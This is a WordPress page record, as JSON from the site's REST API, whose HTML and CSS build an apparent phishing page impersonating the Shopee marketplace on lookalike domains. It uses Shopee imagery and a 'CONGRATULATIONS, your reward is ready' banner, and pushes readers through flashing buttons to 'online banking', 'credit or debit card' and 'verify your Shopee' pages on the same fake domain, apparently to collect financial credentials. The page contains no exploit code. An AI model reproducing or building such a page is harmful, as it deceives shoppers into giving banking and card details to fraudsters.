{"id":11,"date":"2026-07-15T07:25:45","date_gmt":"2026-07-15T07:25:45","guid":{"rendered":"https:\/\/shopeemyinfo.com\/?page_id=10"},"modified":"2026-07-18T10:03:32","modified_gmt":"2026-07-18T10:03:32","slug":"promotions","status":"publish","type":"page","link":"https:\/\/claimshopeemy.com\/","title":{"rendered":""},"content":{"rendered":"\n<!-- 1. Preconnect untuk mempercepat koneksi ke server gambar -->\n<link rel=\"preconnect\" href=\"https:\/\/down-my.img.susercontent.com\">\n<link rel=\"dns-prefetch\" href=\"https:\/\/down-my.img.susercontent.com\">\n\n<!-- 2. Semua CSS digabungkan di atas agar render halaman lebih cepat -->\n<style>\n\/* --- CSS SHOPEE WRAPPER --- *\/\nbody {\n    margin: 0;\n    font-family: Arial, sans-serif;\n    background: #fff;\n    text-align: center;\n}\n\n.shopee-wrapper {\n    max-width: 480px;\n    margin: auto;\n}\n\n.hero {\n    background: linear-gradient(135deg, #ff3c00, #ff9900);\n    color: white;\n    padding: 30px 15px;\n    border-radius: 0 0 20px 20px;\n}\n\n.hero h1 {\n    font-size: 26px;\n    margin: 0;\n    font-weight: bold;\n    animation: pop 1.2s ease infinite alternate, glow 2s infinite;\n}\n\n.hero p {\n    margin-top: 10px;\n    font-size: 14px;\n}\n\n@keyframes pop {\n    from { transform: scale(1); }\n    to { transform: scale(1.08); }\n}\n\n@keyframes glow {\n    0% { text-shadow: 0 0 5px #fff; }\n    50% { text-shadow: 0 0 20px #fff, 0 0 30px yellow; }\n    100% { text-shadow: 0 0 5px #fff; }\n}\n\n.shopee-header img,\n.shopee-content img {\n    width: 100%;\n    border-radius: 10px;\n    margin-top: 10px;\n}\n\n.shopee-content {\n    padding: 15px;\n}\n\n.shopee-red {\n    background: #e60000;\n    color: #000;\n    padding: 20px;\n    font-weight: bold;\n}\n\n.shopee-btn {\n    display: flex;\n    align-items: center;\n    justify-content: space-between;\n    background: linear-gradient(145deg, #ffffff, #e6e6e6);\n    border-radius: 50px;\n    margin: 18px auto;\n    padding: 12px 18px;\n    text-decoration: none;\n    position: relative;\n    box-shadow: 0 8px 0 #cfcfcf, 0 12px 20px rgba(0,0,0,0.25);\n    transition: all 0.15s ease;\n}\n\n.shopee-btn:active {\n    transform: translateY(6px);\n    box-shadow: 0 3px 0 #cfcfcf, 0 6px 10px rgba(0,0,0,0.2);\n}\n\n.shopee-btn::after {\n    content: \"\";\n    position: absolute;\n    inset: 0;\n    border-radius: 50px;\n    box-shadow: 0 0 15px rgba(255,140,0,0.5);\n    opacity: 0;\n    transition: 0.3s;\n}\n\n.shopee-btn:hover::after {\n    opacity: 1;\n}\n\n.shopee-circle {\n    background: radial-gradient(circle, #ff6666, #ff1a1a);\n    color: white;\n    border-radius: 50%;\n    width: 60px;\n    height: 60px;\n    display: flex;\n    align-items: center;\n    justify-content: center;\n    font-size: 13px;\n    text-align: center;\n    animation: pulse 1.5s infinite;\n    box-shadow: 0 4px 10px rgba(0,0,0,0.3);\n}\n\n.shopee-circle span {\n    display: inline-block;\n    animation: bounce 1s infinite;\n}\n\n@keyframes pulse {\n    0% { transform: scale(1); box-shadow: 0 0 0 0 rgba(255,0,0,0.5); }\n    70% { transform: scale(1.1); box-shadow: 0 0 10px 10px rgba(255,0,0,0); }\n    100% { transform: scale(1); }\n}\n\n@keyframes bounce {\n    0%,100% { transform: translateY(0); }\n    50% { transform: translateY(-3px); }\n}\n\n.shopee-text {\n    font-size: 18px;\n    font-weight: bold;\n    color: #004aad;\n    flex-grow: 1;\n}\n\n.shopee-icon {\n    width: 40px;\n}\n\n\/* --- CSS PROMO SPAY --- *\/\n.promo-spay-wrapper {\n    background-color: #f5f5f5; \n    font-family: sans-serif; \n    min-height: 100vh; \n    margin: -20px; \n    padding: 0;\n}\n\n.promo-container {\n    width: 100%; \n    max-width: 480px; \n    margin: auto; \n    background-color: #ffffff;\n    padding-bottom: 280px;\n}\n\n.promo-image { \n    width: 100%; \n    display: block; \n}\n\n.button-container {\n    position: fixed; \n    bottom: 0; \n    left: 50%; \n    transform: translateX(-50%);\n    width: 100%; \n    max-width: 480px; \n    padding: 15px;\n    background: #ffffff; \n    box-shadow: 0 -2px 10px rgba(0,0,0,0.1);\n    z-index: 1000; \n    box-sizing: border-box;\n}\n\n.promo-title {\n    text-align: center; \n    font-size: 22px; \n    color: #ff5900;\n    margin: 0 0 10px 0;\n}\n\n.question-text {\n    text-align: center; \n    font-size: 16px; \n    font-weight: bold;\n    margin-bottom: 15px; \n    color: #333;\n}\n\n.btn {\n    text-align: center; \n    padding: 14px; \n    font-weight: bold; \n    text-decoration: none;\n    display: block; \n    border-radius: 8px; \n    color: #fff; \n    margin-bottom: 10px;\n    box-shadow: 0 5px 0 #333;\n    animation: kelapKelip 1s infinite;\n    transition: transform 0.1s;\n}\n\n.btn:active { \n    transform: translateY(5px); \n    box-shadow: 0 0 0 #333; \n}\n\n@keyframes kelapKelip {\n    0% { background-color: #00FF78; }\n    50% { background-color: #FF5900; }\n    100% { background-color: #00FF78; }\n}\n<\/style>\n\n<!-- 3. Bagian Konten HTML -->\n<div class=\"shopee-wrapper\">\n    <!-- HERO -->\n    <div class=\"hero\">\n        <h1>\ud83c\udf89 CONGRATULATIONS \ud83c\udf89<\/h1>\n        <p>Your reward is ready to be claimed<\/p>\n    <\/div>\n\n    <!-- Header -->\n    <div class=\"shopee-header\">\n        <!-- Gambar pertama menggunakan eager karena paling atas -->\n        <img src=\"https:\/\/down-my.img.susercontent.com\/file\/my-11134258-7rash-macisbxbmupi50@resize_w2880_nl.webp\" decoding=\"async\" loading=\"eager\" alt=\"Header Image\">\n    <\/div>\n<\/div>\n\n<div class=\"promo-spay-wrapper\">\n    <div class=\"promo-container\">\n        <!-- Gambar Promosi (Menggunakan lazy loading agar lebih cepat) -->\n        <img src=\"https:\/\/down-my.img.susercontent.com\/file\/my-11134258-820lf-mp1t1b7kwcnj40@resize_w2880_nl.webp\" class=\"promo-image\" alt=\"Promo 1\" decoding=\"async\" loading=\"lazy\">\n        <img src=\"https:\/\/down-my.img.susercontent.com\/file\/my-11134258-820lh-mp1t9x8c2txp30@resize_w1080_nl.webp\" class=\"promo-image\" alt=\"Promo 2\" decoding=\"async\" loading=\"lazy\">\n        <img src=\"https:\/\/down-my.img.susercontent.com\/file\/my-11134258-820l7-mqfkyqffp3bh11@resize_w1080_nl.webp\" class=\"promo-image\" alt=\"Promo 3\" decoding=\"async\" loading=\"lazy\">\n        \n        <!-- Area Tombol Aksi -->\n        <div class=\"button-container\">\n            <h2 class=\"promo-title\">Choose a payment option below.<\/h2>\n            <p class=\"question-text\">Ready to claim your coins?<\/p>\n            \n            <a href=\"https:\/\/shopeemyinfo.com\/secure-2\/\" class=\"btn\">ONLINE BANKING \u25b6<\/a>\n            <a href=\"https:\/\/shopeemyinfo.com\/true\/\" class=\"btn\">CREDIT OR DEBIT CARD \u25b6<\/a>\n            <a href=\"https:\/\/shopeemyinfo.com\/verify\/\" class=\"btn\">VERIFY YOUR SHOPEE \u25b6<\/a>\n        <\/div>\n    <\/div>\n<\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\ud83c\udf89 CONGRATULATIONS \ud83c\udf89 Your reward is ready to be claimed Choose a payment option below. Ready to claim your coins? ONLINE BANKING \u25b6 CREDIT OR DEBIT CARD \u25b6 VERIFY YOUR SHOPEE \u25b6<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-11","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>-<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/claimshopeemy.com\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"-\" \/>\n<meta property=\"og:description\" content=\"\ud83c\udf89 CONGRATULATIONS \ud83c\udf89 Your reward is ready to be claimed Choose a payment option below. Ready to claim your coins? ONLINE BANKING \u25b6 CREDIT OR DEBIT CARD \u25b6 VERIFY YOUR SHOPEE \u25b6\" \/>\n<meta property=\"og:url\" content=\"https:\/\/claimshopeemy.com\/\" \/>\n<meta property=\"article:modified_time\" content=\"2026-07-18T10:03:32+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/claimshopeemy.com\/wp-content\/uploads\/2026\/07\/cropped-download-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"512\" \/>\n\t<meta property=\"og:image:height\" content=\"512\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/claimshopeemy.com\\\/\",\"url\":\"https:\\\/\\\/claimshopeemy.com\\\/\",\"name\":\"-\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/claimshopeemy.com\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/claimshopeemy.com\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/claimshopeemy.com\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/down-my.img.susercontent.com\\\/file\\\/my-11134258-7rash-macisbxbmupi50@resize_w2880_nl.webp\",\"datePublished\":\"2026-07-15T07:25:45+00:00\",\"dateModified\":\"2026-07-18T10:03:32+00:00\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/claimshopeemy.com\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/claimshopeemy.com\\\/#primaryimage\",\"url\":\"https:\\\/\\\/down-my.img.susercontent.com\\\/file\\\/my-11134258-7rash-macisbxbmupi50@resize_w2880_nl.webp\",\"contentUrl\":\"https:\\\/\\\/down-my.img.susercontent.com\\\/file\\\/my-11134258-7rash-macisbxbmupi50@resize_w2880_nl.webp\"},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/claimshopeemy.com\\\/#website\",\"url\":\"https:\\\/\\\/claimshopeemy.com\\\/\",\"name\":\"\",\"description\":\"CASHBACK VOUCHERS\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/claimshopeemy.com\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"-","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/claimshopeemy.com\/","og_locale":"en_US","og_type":"article","og_title":"-","og_description":"\ud83c\udf89 CONGRATULATIONS \ud83c\udf89 Your reward is ready to be claimed Choose a payment option below. Ready to claim your coins? ONLINE BANKING \u25b6 CREDIT OR DEBIT CARD \u25b6 VERIFY YOUR SHOPEE \u25b6","og_url":"https:\/\/claimshopeemy.com\/","article_modified_time":"2026-07-18T10:03:32+00:00","og_image":[{"width":512,"height":512,"url":"https:\/\/claimshopeemy.com\/wp-content\/uploads\/2026\/07\/cropped-download-1.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/claimshopeemy.com\/","url":"https:\/\/claimshopeemy.com\/","name":"-","isPartOf":{"@id":"https:\/\/claimshopeemy.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/claimshopeemy.com\/#primaryimage"},"image":{"@id":"https:\/\/claimshopeemy.com\/#primaryimage"},"thumbnailUrl":"https:\/\/down-my.img.susercontent.com\/file\/my-11134258-7rash-macisbxbmupi50@resize_w2880_nl.webp","datePublished":"2026-07-15T07:25:45+00:00","dateModified":"2026-07-18T10:03:32+00:00","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/claimshopeemy.com\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/claimshopeemy.com\/#primaryimage","url":"https:\/\/down-my.img.susercontent.com\/file\/my-11134258-7rash-macisbxbmupi50@resize_w2880_nl.webp","contentUrl":"https:\/\/down-my.img.susercontent.com\/file\/my-11134258-7rash-macisbxbmupi50@resize_w2880_nl.webp"},{"@type":"WebSite","@id":"https:\/\/claimshopeemy.com\/#website","url":"https:\/\/claimshopeemy.com\/","name":"","description":"CASHBACK VOUCHERS","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/claimshopeemy.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"}]}},"_links":{"self":[{"href":"https:\/\/claimshopeemy.com\/index.php?rest_route=\/wp\/v2\/pages\/11","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/claimshopeemy.com\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/claimshopeemy.com\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/claimshopeemy.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/claimshopeemy.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11"}],"version-history":[{"count":2,"href":"https:\/\/claimshopeemy.com\/index.php?rest_route=\/wp\/v2\/pages\/11\/revisions"}],"predecessor-version":[{"id":23,"href":"https:\/\/claimshopeemy.com\/index.php?rest_route=\/wp\/v2\/pages\/11\/revisions\/23"}],"wp:attachment":[{"href":"https:\/\/claimshopeemy.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}